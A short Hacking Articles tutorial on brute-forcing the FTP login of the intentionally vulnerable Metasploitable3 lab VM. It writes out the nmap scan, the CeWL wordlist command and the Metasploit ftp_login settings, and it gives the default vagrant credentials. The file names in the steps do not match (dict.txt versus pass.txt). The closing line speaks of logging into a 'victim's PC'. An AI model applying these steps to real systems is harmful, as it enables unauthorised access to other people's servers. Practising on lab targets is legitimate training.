FTP Service Exploitation in Metasploitable 3
Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. It is intended to be used as a target for testing exploits with Metasploit, hence to brush up our Metasploit skills.
We already know that our target is metasploitable 3 so there is no point to discover our target. So, let’s straight move upto nmap scan.
nmap –p- -sV 192.168.1.8
We can see that FTP port is open so we can exploit it and to do so we need a dictionary file through which we can successfully attack. To make a dictionary file type the following command :
cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 –w /root/Desktop/dict.txt
CeWL is a command used to make a customized wordlist using a given URL. Using the above command will make a dictionary file from the Wikipedia of metasploitable3 and might help us to find our password.
After generating the wordlist through CeWL, open Metasploit by typing msfconsole on the terminal of your Kali.
And then type:
msf exploit (ftp_login)>set username vagrant
msf exploit (ftp_login)>set rhosts 192.168.1.8
msf exploit (ftp_login)>set pass_file /root/Desktop/pass.txt
msf exploit (ftp_login)>set stop_on_success true
msf exploit (ftp_login)> exploit
Above used exploit will give you a correct password to go with the username. Once you have got it then open the WinScp software, give the target’s IP and the port number along with the username: vagrant and password: vagrant
Then click on Login button. After logging in you can find you the files on the FTP server and you can use them to your advantage.
This is how you can use FTP port to log in to your victim’s PC. Enjoy!
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.